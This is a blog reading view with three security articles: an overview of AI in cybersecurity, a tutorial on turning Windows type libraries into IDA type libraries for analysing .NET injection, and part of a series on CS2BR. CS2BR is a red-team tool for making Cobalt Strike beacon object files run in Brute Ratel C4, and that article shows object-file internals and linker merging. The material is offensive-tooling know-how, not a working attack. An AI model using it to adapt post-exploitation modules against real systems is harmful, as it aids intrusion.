Reading view

There are new articles available, click to refresh the page.

AI in Cybersecurity: Bridging the Gap Between Imagination and Reality


In today’s digital environment, we encounter a mix of evolving cyber systems and the complexities they introduce. One notable influence in this space is artificial intelligence (AI), alongside associated technologies such as machine learning, which offer promising avenues for reshaping cyber strategies.

Traditionally, cybersecurity has operated with definitive parameters, set boundaries, and post-event counteractions. Yet, given the growth in digital data and the evolving nature of threats, there’s a clear shift towards strategies that are not only responsive but also proactive. AI and machine learning serve this purpose, providing defenses that are not only immediate but also predictive.

It’s important to clarify that the discussion isn’t solely about AI as a standalone term. Within this broader term are technologies like machine learning, neural networks, and deep learning, each having its significance in cybersecurity. However, given the extensive scope, our focus will be on select areas, shedding light on how these technologies function and their practical implications in cybersecurity.

The goal here is to explore the roles of AI and machine learning without presenting them as the singular answer but rather to understand their potential and limitations within cybersecurity.

For this purpose, a well-known cybersecurity framework proposed by NIST was used to understand the solution categories needed to protect, detect, react and defend against cyberattacks

R. Kaur et al., Information Fusion 97 (2023) 101804
Pillars of NIST framework
The pillars of the NIST framework

The subsequent section provides a graphical representation that outlines specific areas in which AI and machine learning are applied in cybersecurity. These areas span from ‘Automated Security Control Validation’ to ‘Decision Support for Risk Planning’, showcasing the various types of technology that can be categorized under each domain. This visualization serves as a reference to understand the scope and classification of technologies discussed in the article.

Overview of potential use cases for AI
Created after:
Ramanpreet Kaur, Dušan Gabrijelčič, Tomaž Klobučar,
Artificial intelligence for cybersecurity: Literature review and future research directions, Information Fusion, Volume 97, 2023
Overview of potential use cases for AI
Created after:
Ramanpreet Kaur, Dušan Gabrijelčič, Tomaž Klobučar,
Artificial intelligence for cybersecurity: Literature review and future research directions, Information Fusion, Volume 97, 2023
Overview of potential use cases for AI
Created after:
Ramanpreet Kaur, Dušan Gabrijelčič, Tomaž Klobučar,
Artificial intelligence for cybersecurity: Literature review and future research directions, Information Fusion, Volume 97, 2023

In the domain of cybersecurity, while much attention has been given to Protection and Detection, there are other areas that demand attention and hold significant promise (in our case that would be Identify, Respond, Recover), especially with the advent of AI technologies. Many of these areas have been sidelined in popular discussions but are now emerging as pivotal components in the evolving cybersecurity landscape. Among these areas, we have identified several noteworthy topics:

  • Automated Security Control Validation: This refers to the automated processes used to confirm that security measures are operating correctly within a given system.
  • Automated Risk Analysis and Impact Assessment: A process that uses automation to evaluate potential threats and the possible consequences they could have on an organization.
  • Decision Support for Risk Planning: Using technology to aid decision-makers in strategizing and planning for potential risks.
  • Automated Responsibility Allocation: A method that uses automation to assign roles and responsibilities within a system, ensuring that tasks are designated to the right entity or personnel.
  • Information Sharing Property Platform: A platform designed to facilitate the sharing of information across different entities in a secure manner.

The foundation of this stems from the previously cited publication, a meta study

resulted in 2395 studies, of which 236 were identified as primary. This article classifies the identified AI use cases based on a NIST cybersecurity framework using a thematic analysis approach.

Why these topics?

In the current digital environment, businesses are required to anticipate and mitigate threats and vulnerabilities. The cyber landscape is continually changing. What was once considered secure can now be a weak point, underscoring the relevance of tools like Automated Security Control Validation and Risk Analysis. These tools enable companies to promptly detect and rectify vulnerabilities, staying abreast of the sophisticated techniques used by adversaries.

Business continuity is also crucial. Unresolved security issues can disrupt operations, affecting revenue and brand perception. Decision Support for Risk Planning offers a systematic approach for risk assessment and management, ensuring smooth operations amidst emerging threats.

Regulatory compliance adds another layer of complexity in many industries. Meeting these regulations often means implementing stringent security protocols. With updated practices such as automated responsibility allocation, companies can ensure adherence to legal requirements, minimizing legal repercussions.

As organizations grow, managing security across expansive infrastructures manually becomes complex. Automated solutions offer scalability in security, allowing businesses to expand without a corresponding rise in resources.

Information today represents a strategic asset. Platforms like an Information Sharing Property Platform could be essential, promoting a collective approach to cybersecurity, letting businesses share insights and strengthen overall security.

Building trust with customers, partners, and stakeholders is fundamental. Ensuring data security and safe interactions enhances this trust, providing a competitive advantage.

To sum up, in today’s digital world, for businesses to succeed, it’s imperative to embrace and stay updated with advanced security practices.

Evaluation of the studies under consideration

Below, we will examine each domain in detail, aiming to identify the pros and cons of employing AI and machine learning techniques, as derived from our analysis of the meta-study within the cybersecurity context.

Automated Security Control Validation

Automated checks can be performed much faster than manual validations.Might occasionally flag legitimate configurations as violations.
Perform checks uniformly without human error.Might not always adapt swiftly to rapidly evolving threat landscapes or new security protocols.
Handle large infrastructures without additional resources.Over-dependence on AI might lead to negligence in manual checks.
Real-time validation, ensuring immediate detection of security misconfigurations.May not capture subtle nuances or instinctual insights that experienced human professionals might recognize in complex security scenarios.
Overview of advantages and disadvantages of the integration of AI in Automated Security Control Validation

Automated Risk Analysis and Impact Assessment

Process vast amounts of data rapidly, providing insights quicker.Effective AI integration requires understanding and tuning of the models.
Predict potential future threats based on patterns.Excessive trust in AI’s recommendations might overshadow human judgment.
Algorithms can correlate data from various sources for a more comprehensive risk profile.Effectiveness is dependent on the quality of the data fed to it.
Overview of advantages and disadvantages of the integration of AI in Automated Risk Analysis and Impact Assessment

Decision Support for Risk Planning

Simulation of various risk scenarios, aiding in decision-making.If historical data has biases, AI recommendations might inherit them.
Provide real-time updates based on changing data.It might be challenging to effectively implement AI in decision-making processes.
Overview of advantages and disadvantages of the integration of AI in Decision Support for Risk Planning

Automated Responsibility Allocation

Immediate allocation of responsibilities during incidents.AI might not understand the nuances of every situation.
Reduce decision-making time during crises.Requires continuous updates to responsibility matrices and rules.
Decisions are based on data, not emotions or internal politics.Sole reliance on AI might lead to issues if the system fails during a critical incident.
Overview of advantages and disadvantages of the integration of AI in Automated Responsibility Allocation

Information Sharing Property Platform

Shift through vast amounts of shared information to find relevant insights.AI processing shared information might raise privacy issues.
Spot emerging threats or vulnerabilities from shared data.Might misinterpret or take out of context certain shared information.
Generate summaries or insights from the shared information.If not properly secured, AI systems could be a target for malicious actors trying to manipulate shared data.
Overview of advantages and disadvantages of the integration of AI in Information Sharing Property Platform

When examining the pros and cons presented, are there recurring themes that allow us to draw overarching conclusions? INDEED, there are!

We can identify four distinct categories:

  1. Speed and Data
  2. Understanding and Decision Making
  3. Adaptability and Complexity
  4. Security and Information

But what does each category signify, and how do they influence the broader scope of AI and machine learning in cybersecurity?


In the context of AI and machine learning within cybersecurity, several themes are evident:

Regarding Speed and Data, AI facilitates rapid and uniform data processing. However, it’s important to note that the quality of outcomes is contingent on the integrity of the data input, and there exists a risk of over-reliance on this speed.

In the area of Understanding and Decision Making, AI offers expansive views, promoting more objective decision-making processes. Yet, AI systems might not always replicate the nuanced understanding characteristic of human cognition.

Within Adaptability and Complexity, AI’s strength lies in its scalability and its ability to model diverse scenarios. Nevertheless, these systems can face challenges adapting to rapid technological changes, and their deployment can be intricate.

For Security and Information, AI’s capability for real-time monitoring allows for immediate threat detection. However, the speed of processing might increase the probability of misinterpretations, potentially introducing security vulnerabilities.

In addition to these themes, the Human Factor remains pivotal. AI systems, despite their sophistication, cannot replace human judgment, especially in ambiguous situations that require intuitive reasoning. The human element brings a unique combination of experience, intuition, and ethical consideration, aspects that AI currently cannot replicate fully. Hence, while automating processes can enhance efficiency, the human oversight ensures that decisions align with organizational values and the broader context. Balancing the capabilities of AI with human expertise optimizes the cybersecurity framework, ensuring robustness and adaptability.

Overall, while AI and machine learning bring substantial advantages to cybersecurity, it’s crucial to consider their inherent limitations and dependencies.

Maurice Striek

Maurice Striek

Maurice Striek is a Consultant in the Cyber Security & Architecture Team (CSA) at NVISO. His expertise lies in risk analysis based on IT-Grundschutz and ISO 27001/2 standards, as well as data analysis and data management.

Generating IDA Type Information Libraries from Windows Type Libraries

When working with IDA, a commonly leveraged feature are type information libraries (TIL). These libraries contain high-level type information such as function prototypes, type definitions, standard structures or enums; enabling IDA to convert statements such as movsxd rbx, dword ptr [r12+3Ch] into, for example, the more human-readable counterpart movsxd rbx, [r12+IMAGE_DOS_HEADER.e_lfanew].

On Windows, a similar concept called type libraries (TLB) exists to describe COM (Component Object Model) objects. In a nutshell, COM provides a language-independent interface to objects, abstracting how they have been implemented themselves.

In this quick-post, we’ll explore how to convert Windows type libraries (TLB) into IDA type information libraries (TIL). In particular, we’ll generate the necessary type information library to analyze .NET injection into unmanaged processes using mscoree.dll and mscorlib.dll (e.g., through _AppDomain). In a hurry? Grab the .NET type information library directly!


Achieving TLB-to-TIL conversion can be done through an intermediary C++ conversion:

  1. First, the MSVC (Microsoft Visual C++) compiler can be leveraged to convert TLBs into their respective C++ header files.
  2. Once the C++ header files generated, IDAClang can be used to convert these into TILs.
A schema of MSVC converting TLBs into C++ as well as IDAClang converting C++ into TILs.
Figure 1: A schema of MSVC converting TLBs into C++ as well as IDAClang converting C++ into TILs.


To achieve TLB-to-TIL conversion, this article requires the following tools:

  1. The MSVC (Microsoft Visual C++) compiler installed through Visual Studio*.
  2. The IDAClang command-line utility.

* For our example, we’ll be generating a type information library targeting the .NET Framework, hence also requiring header files part of the .NET Framework Developer Pack (a.k.a. SDK). The .NET Framework Developer Pack can be installed through Visual Studio.

Given both MSVC and IDAClang rely on a properly configured developer environment (e.g., a configured INCLUDE environment variable), this article assumes all commands are issued within a Visual Studio Developer Command Prompt such as the “x64 Native Tools Command Prompt”.

A capture of the “x64 Native Tools Command Prompt” within the Windows Start menu.
Figure 2: A capture of the “x64 Native Tools Command Prompt” within the Windows Start menu.

Converting Microsoft Type Libraries to C++ Headers

Windows type libraries are a Windows-specific feature which integrates seamlessly with the MSVC compiler through the #import statement.

#import creates two header files that reconstruct the type library contents in C++ source code. The primary header file is similar to the one produced by the Microsoft Interface Definition Language (MIDL) compiler, but with additional compiler-generated code and data. The primary header file has the same base name as the type library, plus a .TLH extension.


As such, creating a C++ file to import a type library will generate its C++ header. Given we wish to convert mscorlib.tlb into C++ headers, we can create the following C++ file named, for example, til.cpp.

#import "mscorlib.tlb" raw_interfaces_only auto_rename

Once the C++ file has been created, we can rely on the MSVC compiler to generate the necessary headers. The beneath command will generate the mscorlib.tlh file.

CL.exe /c /D NDEBUG /D _CONSOLE /D _UNICODE /D UNICODE /permissive- /TP til.cpp

Converting C++ Headers to IDA Type Information Libraries

With the C++ headers generated, we can now proceed to create the IDA type information library. To do so, we can create a new C++ header file that will reference any standard headers (e.g., those from the .NET Framework Developer Pack) and generated headers (i.e., the previously generated mscorlib.tlh) we wish to use in IDA. The following is our example til.h.

// Include standard headers
// Example: Microsoft .NET Framework Developer Pack
#include <alink.h>
#include <clrdata.h>
#include <cordebug.h>
#include <corhlpr.h>
#include <corprof.h>
#include <corpub.h>
#include <corsym.h>
#include <fusion.h>
#include <gchost.h>
#include <ICeeFileGen.h>
#include <isolation.h>
#include <ivalidator.h>
#include <ivehandler.h>
#include <metahost.h>
#include <mscoree.h>
#include <openum.h>
#include <StrongName.h>
#include <tlbref.h>
#include <VerError.h>

// Include generated headers
// Example: Microsoft Common Language Runtime Class Library
//          The mscorlib.h generated from mscorlib.tlb
#include "mscorlib.tlh"

Once the C++ header file created, we can rely on IDAClang to generate the TIL.

idaclang.exe -x c++ -target x86_64-pc-windows -ferror-limit=0 --idaclang-tildesc "Example" --idaclang-tilname "example.til" til.h

MSVC and Clang (used in IDAClang) are two different C++ compilers. While they can mostly agree, compiling MSVC-generated C++ code using Clang is bound to generate non-fatal errors. While IDAClang may generate quite some errors as shown below, the TIL conversion should succeed after a moment.

IDACLANG: nonfatal: ./mscorlib.tlh:10774:1: error: enumeration previously declared with fixed underlying type
IDACLANG: nonfatal: ./mscorlib.tlh:11509:64: error: expected ';' after struct
IDACLANG: nonfatal: ./mscorlib.tlh:11509:1: error: declaration of anonymous struct must be a definition
IDACLANG: nonfatal: ./mscorlib.tlh:11510:11: error: expected unqualified-id

As an example, we published our .NET type information library mscoru.til.

Using the IDA Type Information Library

Once the TIL generated, we can proceed to make it available to IDA. To do so, copy the TIL to the appropriate folder which, in our example, could be the C:\Program Files\IDA Pro 8.3\til\pc directory. Once the TIL staged, IDA should display the new type information library and allow it to be loaded.

A capture of IDA’s Available Type Libraries.
Figure 3: A capture of IDA’s Available Type Libraries.

With the TIL loaded, we can now instruct IDA to import the new structures such as ICLRMetaHost and its ICLRMetaHost_vtbl virtual function table.

A capture of IDA’s ICLRMetaHost structure.
Figure 4: A capture of IDA’s ICLRMetaHost structure.
A capture of IDA’s ICLRMetaHost_vtbl structure.
Figure 5: A capture of IDA’s ICLRMetaHost_vtbl structure.

Once our structures imported, we can leverage IDA’s structure offsets to make raw offsets human-readable as observed in the following slider (left before, right after).

Figure 6: A capture of IDA’s ICLRMetaHost.GetRuntime call.

In our .NET injection analysis, this enables us to identify where the raw .NET assembly is loaded as observed in the beneath slider (left before, right after). Such information in turn allows us to identify from where it originates and where we could best intercept it for further analysis.

Figure 7: A capture of IDA’s _AppDomain.Load_3 call.

Conclusions & Lessons Learned

While tools such as OLEViewer alongside MIDL could in theory generate C++ code as well, we found these to be unreliable. Instead, working with MSVC and IDAClang provides a quick (and clean) approach to convert TLBs into TILs.

The above described process can be extended to other abused COM objects such as the Windows Script Host Object Model (with TLB %SystemRoot%\System32\wshom.ocx) or the Microsoft Management Console (with TLB %SystemRoot%\System32\mmc.exe).

By creating IDA type information libraries matching libraries used by adversaries we gain the capability to properly understand their tooling, how to analyze further stages and how to best defend against them.



Maxime Thiebaut

Maxime Thiebaut is a GCFA-certified Incident Response & Digital Forensics Analyst within NVISO CSIRT. He spends most of his time performing defensive research and responding to incidents. Previously, Maxime worked on the SANS SEC699 course. Besides his coding capabilities, Maxime enjoys reverse engineering samples observed in the wild.

Introducing CS2BR pt. III – Knees deep in Binary


Over the span of the previous two blog posts in the series, I showed why the majority of Cobalt Strike (CS) BOFs are incompatible with Brute Ratel C4 (BRC4) and what you can do about it. I also presented CS2BR itself: it’s a tool that makes patching BOFs to be compatible with BRC4 a breeze. However, we also found some limitations to CS2BR’s current approach.

In this (final?) post in this series, we’ll take a look at one of CS2BR’s shortcomings: its reliance on source-code for patching. We’ll see how this can be resolved and – spoiler alert – why we couldn’t (yet!) but decided to pull the plug on it. That’s right: this blog post won’t present a fancy new solution but the challenges you’ll encounter when you go down this rabbit hole.

True story: I thought it would be an easier ride.

This post will get a bit more technical than its predecessors. Don’t worry though, I’ll try my best not to get lost in itty-bitty details. So feel free to grab a coffee and prepare for a journey into the wonderful world of object files, how you can mess with them, and what I did to them.

I. Underlying motivation

When I finished work on CS2BR’s source code patching, I realized that there were two major issues with it that caused me headaches and that I wasn’t happy with:

  1. Input arguments: Supplying BOFs with input arguments in BRC4 isn’t straightforward and requires you to figure out the number and format of arguments, feed them into a standalone Python script, and pass the output into BRC4.
  2. Source code: In order to make BOFs compatible with BRC4 in the first place, CS2BR patches a compatibility layer (and some extras) into a BOF’s source code. You’ll then need to recompile the BOF in order to use it in BRC4.

While the first issue is just somewhat awkward, the second one can be a real showstopper in some cases:

  • Third party BOFs: There are proprietary, commercial BOFs out there that you might like to use in BRC4, but can’t because they’re incompatible. Since you usually don’t have access to their source code, you can’t use CS2BR to patch them.
  • Compilation: Usually BOFs come with limited features and thus don’t require crazy compilation environments. Well, if they do, CS2BR’s source code patching can interfere with that and potentially screw up your compilation configuration. You’d then need to get into the depths of makefiles, build scripts and Visual Studio project configurations to troubleshoot.

So wouldn’t it be great if we didn’t need access to source code? And wouldn’t it be cool to avoid recompilation of BOFs? There surely has to be a way to do this, right?

II. The idea

Since BOFs are object files (hence the name, beacon object files) and CS2BR’s compatibility layer can be compiled into an object file, we might just be able to merge both of them into a single object file.

Imagine it was that easy.

And indeed, it appears that you can merge object files using ld, the GNU linker:

ld --relocatable cs2br.o bof.o -o brc4bof.o

That’s the basic premise. Before we continue with the details of this idea, let’s have a brief look at the “Common Object File Format” (COFF) that our object files come in.

About COFF

At their core, object files are an intermediate format of executables: they contain compiled code and data but aren’t directly executable. Here’s the source code of a simple BRC4 BOF that prints its input arguments:

#include "badger_exports.h"
void coffee(char** argv, int argc, WCHAR** dispatch) {
    int i = 0;
    for (; i < argc; i++) {
        BadgerDispatch(dispatch, "Arg #%i: \"%s\"\n", (i+1), argv[i]);

This can be compiled into a COFF file using a C compiler such as mingw on a Linux machine:

$ x86_64-w64-mingw32-gcc -o minimal.o -c minimal.c

$ file minimal.o        
minimal.o: Intel amd64 COFF object file, no line number info, not stripped, 7 sections, symbol offset=0x216, 19 symbols, 1st section name ".text"

We can get detailed information about the compiled object file using the nd or objdump utilities:

objdump output
$ objdump -x minimal.o              

minimal.o:     file format pe-x86-64
architecture: i386:x86-64, flags 0x00000039:
start address 0x0000000000000000

Characteristics 0x4
        line numbers stripped

Time/Date               Wed Dec 31 19:00:00 1969
Magic                   0000
MajorLinkerVersion      0
MinorLinkerVersion      0
SizeOfCode              0000000000000000
SizeOfInitializedData   0000000000000000
SizeOfUninitializedData 0000000000000000
AddressOfEntryPoint     0000000000000000
BaseOfCode              0000000000000000
ImageBase               0000000000000000
SectionAlignment        00000000
FileAlignment           00000000
MajorOSystemVersion     0
MinorOSystemVersion     0
MajorImageVersion       0
MinorImageVersion       0
MajorSubsystemVersion   0
MinorSubsystemVersion   0
Win32Version            00000000
SizeOfImage             00000000
SizeOfHeaders           00000000
CheckSum                00000000
Subsystem               00000000        (unspecified)
DllCharacteristics      00000000
SizeOfStackReserve      0000000000000000
SizeOfStackCommit       0000000000000000
SizeOfHeapReserve       0000000000000000
SizeOfHeapCommit        0000000000000000
LoaderFlags             00000000
NumberOfRvaAndSizes     00000000

The Data Directory
Entry 0 0000000000000000 00000000 Export Directory [.edata (or where ever we found it)]
Entry 1 0000000000000000 00000000 Import Directory [parts of .idata]
Entry 2 0000000000000000 00000000 Resource Directory [.rsrc]
Entry 3 0000000000000000 00000000 Exception Directory [.pdata]
Entry 4 0000000000000000 00000000 Security Directory
Entry 5 0000000000000000 00000000 Base Relocation Directory [.reloc]
Entry 6 0000000000000000 00000000 Debug Directory
Entry 7 0000000000000000 00000000 Description Directory
Entry 8 0000000000000000 00000000 Special Directory
Entry 9 0000000000000000 00000000 Thread Storage Directory [.tls]
Entry a 0000000000000000 00000000 Load Configuration Directory
Entry b 0000000000000000 00000000 Bound Import Directory
Entry c 0000000000000000 00000000 Import Address Table Directory
Entry d 0000000000000000 00000000 Delay Import Directory
Entry e 0000000000000000 00000000 CLR Runtime Header
Entry f 0000000000000000 00000000 Reserved

The Function Table (interpreted .pdata section contents)
vma:                    BeginAddress     EndAddress       UnwindData
 0000000000000000:      0000000000000000 000000000000006a 0000000000000000

Dump of .xdata
 0000000000000000 (rva: 00000000): 0000000000000000 - 000000000000006a
        Version: 1, Flags: none
        Nbr codes: 3, Prologue size: 0x08, Frame offset: 0x0, Frame reg: rbp
          pc+0x08: alloc small area: rsp = rsp - 0x30
          pc+0x04: FPReg: rbp = rsp + 0x0 (info = 0x0)
          pc+0x01: push rbp

Idx Name          Size      VMA               LMA               File off  Algn
  0 .text         00000070  0000000000000000  0000000000000000  0000012c  2**4
  1 .data         00000000  0000000000000000  0000000000000000  00000000  2**4
                  ALLOC, LOAD, DATA
  2 .bss          00000000  0000000000000000  0000000000000000  00000000  2**4
  3 .rdata        00000010  0000000000000000  0000000000000000  0000019c  2**4
  4 .xdata        0000000c  0000000000000000  0000000000000000  000001ac  2**2
  5 .pdata        0000000c  0000000000000000  0000000000000000  000001b8  2**2
  6 .rdata$zzz    00000020  0000000000000000  0000000000000000  000001c4  2**4
[  0](sec -2)(fl 0x00)(ty    0)(scl 103) (nx 1) 0x0000000000000000 minimal.c
[  2](sec  1)(fl 0x00)(ty   20)(scl   2) (nx 1) 0x0000000000000000 coffee
AUX tagndx 0 ttlsiz 0x0 lnnos 0 next 0
[  4](sec  1)(fl 0x00)(ty    0)(scl   3) (nx 1) 0x0000000000000000 .text
AUX scnlen 0x6a nreloc 2 nlnno 0
[  6](sec  2)(fl 0x00)(ty    0)(scl   3) (nx 1) 0x0000000000000000 .data
AUX scnlen 0x0 nreloc 0 nlnno 0
[  8](sec  3)(fl 0x00)(ty    0)(scl   3) (nx 1) 0x0000000000000000 .bss
AUX scnlen 0x0 nreloc 0 nlnno 0
[ 10](sec  4)(fl 0x00)(ty    0)(scl   3) (nx 1) 0x0000000000000000 .rdata
AUX scnlen 0xf nreloc 0 nlnno 0
[ 12](sec  5)(fl 0x00)(ty    0)(scl   3) (nx 1) 0x0000000000000000 .xdata
AUX scnlen 0xc nreloc 0 nlnno 0
[ 14](sec  6)(fl 0x00)(ty    0)(scl   3) (nx 1) 0x0000000000000000 .pdata
AUX scnlen 0xc nreloc 3 nlnno 0
[ 16](sec  7)(fl 0x00)(ty    0)(scl   3) (nx 1) 0x0000000000000000 .rdata$zzz
AUX scnlen 0x17 nreloc 0 nlnno 0
[ 18](sec  0)(fl 0x00)(ty    0)(scl   2) (nx 0) 0x0000000000000000 __imp_BadgerDispatch

OFFSET           TYPE              VALUE
0000000000000046 IMAGE_REL_AMD64_REL32  .rdata
0000000000000050 IMAGE_REL_AMD64_REL32  __imp_BadgerDispatch

OFFSET           TYPE              VALUE
0000000000000000 IMAGE_REL_AMD64_ADDR32NB  .text
0000000000000004 IMAGE_REL_AMD64_ADDR32NB  .text
0000000000000008 IMAGE_REL_AMD64_ADDR32NB  .xdata

This gave us quite a lot of information of which I’d like to highlight and unpack three particularly important bits:

  1. Sections: These are regions of arbitrary, binary data. Their content is indicated by a section’s name and flags. For example, the .text section with the CODE flag set will usually contain compiled code whereas the .rdata section with the READONLY and DATA flags will contain readonly data (such as strings used in the application).
  2. Symbols: Symbols are used to reference various things in object files, such as sections (e.g. .text), functions (e.g. coffee) and imports (e.g. __imp_BadgerDispatch).
  3. Relocations: An object file’s sections can contain references to symbols (and thus to other sections, functions, and imports). When the file is compiled or loaded into memory by a COFF loader such as BRC4, these references need to be resolved to actual relative or absolute memory addresses.
    For example, the above BadgerDispatch call references the string Arg #%i: \"%s\"\n which is located in the .rdata section. The first relocation entry in the .text section indicates that at offset 0x46 into the .text section, there is a reference to the .rdata symbol (which points to the .rdata section), which needs to be resolved as a relative address.
COFF section contents dumped using objdump
$ objdump -s -j .rdata minimal.o

minimal.o:     file format pe-x86-64

Contents of section .rdata:
 0000 41726720 2325693a 20222573 220a0000  Arg #%i: "%s"...
$ objdump -S -j .text minimal.o 

minimal.o:     file format pe-x86-64

Disassembly of section .text:

0000000000000000 <coffee>:
   0:   55                      push   %rbp
   1:   48 89 e5                mov    %rsp,%rbp
   4:   48 83 ec 30             sub    $0x30,%rsp
   8:   48 89 4d 10             mov    %rcx,0x10(%rbp)
   c:   89 55 18                mov    %edx,0x18(%rbp)
   f:   4c 89 45 20             mov    %r8,0x20(%rbp)
  13:   c7 45 fc 00 00 00 00    movl   $0x0,-0x4(%rbp)
  1a:   eb 3e                   jmp    5a <coffee+0x5a>
  1c:   8b 45 fc                mov    -0x4(%rbp),%eax
  1f:   48 98                   cltq
  21:   48 8d 14 c5 00 00 00    lea    0x0(,%rax,8),%rdx
  28:   00 
  29:   48 8b 45 10             mov    0x10(%rbp),%rax
  2d:   48 01 d0                add    %rdx,%rax
  30:   48 8b 10                mov    (%rax),%rdx
  33:   8b 45 fc                mov    -0x4(%rbp),%eax
  36:   8d 48 01                lea    0x1(%rax),%ecx
  39:   48 8b 45 20             mov    0x20(%rbp),%rax
  3d:   49 89 d1                mov    %rdx,%r9
  40:   41 89 c8                mov    %ecx,%r8d
  43:   48 8d 15 00 00 00 00    lea    0x0(%rip),%rdx        # 4a <coffee+0x4a>
  4a:   48 89 c1                mov    %rax,%rcx
  4d:   48 8b 05 00 00 00 00    mov    0x0(%rip),%rax        # 54 <coffee+0x54>
  54:   ff d0                   call   *%rax
  56:   83 45 fc 01             addl   $0x1,-0x4(%rbp)
  5a:   8b 45 fc                mov    -0x4(%rbp),%eax
  5d:   3b 45 18                cmp    0x18(%rbp),%eax
  60:   7c ba                   jl     1c <coffee+0x1c>
  62:   90                      nop
  63:   90                      nop
  64:   48 83 c4 30             add    $0x30,%rsp
  68:   5d                      pop    %rbp
  69:   c3                      ret
  6a:   90                      nop
  6b:   90                      nop
  6c:   90                      nop
  6d:   90                      nop
  6e:   90                      nop
  6f:   90                      nop

These are the central parts of COFF files that are relevant to this blog post.

Merging object files

Continuing with the idea of merging object files, it turns out that it’s not just going to be a simple ld. Let’s compare a regular BOF in Cobalt Strike to a CS2BR BOF in BRC4:

Regular CS BOF

Pictured above is a regular CS BOF: It resides in a beacon, is executed via its go entrypoint and can make use of serveral CS BOF APIs. In order to execute the BOF, the beacon acts as a linker: it maps the BOF’s sections into memory, resolves CS BOF API imports to the beacon’s internal implementations and resolves relocations. That’s the regular flow of things.


Here’s how the general CS2BR approach works: it provides the CS BOF APIs as part of its compatibility layer. This layer in turn uses the BRC4 BOF APIs which are implemented in the BRC4 badger. From our perspective, a badger loads & executes a BOF similar to how CS does.

When we patch a BOF’s source code via CS2BR and compile it afterwards, the coffee entrypoint will be included in the BOF and able to invoke the original go entrypoint (*). Additionally, calls to the CS BOF API will be “rerouted” to CS2BR’s compatibility layer (*). When both BOF and the CS2BR compatibility layer are compiled separately though, we need to ensure that those two connections are made when we merge the object files. For simplicity’s sake, let’s refer to the compiled CS BOF as bof.o and to the compiled CS2BR compatibility layer as cs2br.o:

  • Entrypoint: The coffee entrypoint in cs2br.o needs to reference the go entrypoint in bof.o. When the files are merged, this reference must be resolved.
  • APIs: The CS BOF APIs imported in bof.o must be “re-wired” so they don’t reference imports but cs2br.o‘s implementations instead.

Well, this doesn’t sound super complicated, does it?

III. Execution

Now it’s only a matter of putting everything together. We’ll start with the entrypoint:

Preparing the entrypoint

In order to reference bof.o‘s go entrypoint from cs2br.o, we can leverage the fact that such operations are precisely what object files and linkers are great at accomplishing: by defining go as an external symbol in cs2br.o, a linker will resolve it when also supplying it with bof.o which provides this exact symbol. So here’s the single line we add to CS2BR’s badger_stub.c that contains our custom coffee entrypoint:

extern void go(void *, int);

Now, when we compile CS2BR’s entrypoint in badger_stub.c and its compatibility layer beacon_wrapper.h, we observe the resulting cs2br.o‘s symbols. Also, for comparison, let’s also inspect bof.o‘s symbols:

$ objdump -x cs2br.o | grep go  
[ 52](sec  0)(fl 0x00)(ty   20)(scl   2) (nx 0) 0x0000000000000000 go

$ objdump -x bof.o | grep go
[  2](sec  1)(fl 0x00)(ty   20)(scl   2) (nx 1) 0x0000000000000000 go

We can use Microsoft’s documentation on the PE format (which also covers COFF) to better understand what those entries mean:

  • sec“The signed integer that identifies the section, using a one-based index into the section table. Some values have special meaning […].”
    • Value 0 (IMAGE_SYM_UNDEFINED): “[…] A value of zero indicates that a reference to an external symbol is defined elsewhere. […]”
  • ty“A number that represents type. Microsoft tools set this field to 0x20 (function) or 0x0 (not a function). […]”
  • The value (hex value before the symbol name): “The value that is associated with the symbol. The interpretation of this field depends on SectionNumber and StorageClass. A typical meaning is the relocatable address.”
  • scl“An enumerated value that represents storage class. […]”
    • Value 2 (IMAGE_SYM_CLASS_EXTERNAL): “[…] The Value field indicates the size if the section number is IMAGE_SYM_UNDEFINED (0). If the section number is not zero, then the Value field specifies the offset within the section.”

Using this information, we can deduct that:

  • cs2br.o‘s go symbol is an external symbol defined elsewhere.
  • bof.o‘s go symbol is located in section 1 (.text) and located right at the start of the section (offset 0).

When we merge them using ld (ld --relocatable bof.o cs2br.o -o brbof.o --oformat pe-x86-64) and inspect them in a disassembler like Ghidra, we see that the linking worked as expected and cs2br.o‘s coffee actually calls bof.o‘s go:

Resolved go entrypoint in Ghidra

Nice, the first thing is done. This was pretty easy!

Thanks, stackoverflow!

Rewiring CS BOF API imports

In the previous section we declared go as an external symbol in cs2br.o‘s source code. This allowed us to have the linker resolve the reference to the supplied bof.o‘s implementation of go.

Rewiring the CS BOF API imports of bof.o to cs2br.o‘s implementations isn’t as straightforward though. Let’s have a look at the symbols involved:

$ objdump -x cs2br.o | grep BeaconPrintf
[ 24](sec  1)(fl 0x00)(ty   20)(scl   2) (nx 0) 0x00000000000005e1 BeaconPrintf

$ objdump -x bof.o | grep BeaconPrintf                                                
[ 18](sec  0)(fl 0x00)(ty    0)(scl   2) (nx 0) 0x0000000000000000 __imp_BeaconPrintf
0000000000000027 IMAGE_REL_AMD64_REL32  __imp_BeaconPrintf

From this output we learn that:

  • cs2br.o exports BeaconPrintf as a symbol that
    • is contained in section #1 (.text)
    • is a function (ty 20)
    • is at offset 0x5e1 into its section
  • bof.o exports __imp_BeaconPrintf as a symbol that
    • has the __imp_ prefix, indicating that this function was declared using __declspec(import) and needs to be imported at runtime
    • is an external symbol (section value IMAGE_SYM_UNDEFINED)
    • is not a function (ty 0)
  • bof.o also references __imp_BeaconPrintf in a relocation in the .text section. Which makes sense considering that BeaconPrintf is imported from the CS BOF API and its implementation is not included in the BOF’s source code.

The fact that __imp_BeaconPrintf referes to an import makes it special and more tricky to handle:

Relative reference to pointer to BeaconPrintf
Pointer to BeaconPrintf

Contrary to how cs2br.o called go (which was a call to an address relative to the CALL statement), bof.o calls BeaconPrintf by absolute address that is read from the place in memory where __imp_BeaconPrintf is located. In other words, __imp_BeaconPrintf is a pointer to the actual implementation and a loader needs to calculate and populate this address at runtime.

If we wanted to make the linker resolve these references in bof.o like it did with the go symbol in cs2br.o above, we would need cs2br.o to export not the function implementations but pointers to those implementations. Then we’d still need to rename all the imported functions in bof.o so they don’t have the __imp_ prefix in their names anymore or else a loader might attempt to import them again (and fail doing so).

There are two major challenges to this though:

  • How can we modify parts (such as symbols) of object files? The GNU utilities I found so far only allowed me to read but not write them.
  • How can we debug merged object files? When we just execute any merged BOF via a BRC4 badger, the badger might just not output anything (in the best case) or straight up crash on us (in the worst case).

I’ll cover those next before continuing with the process of merging object files.

This wouldn't work out.

IV. Getting the right tools for the job

As outlined above, there are two major challenges related to the tooling I needed to overcome at this point.

Reading/writing COFF: structex

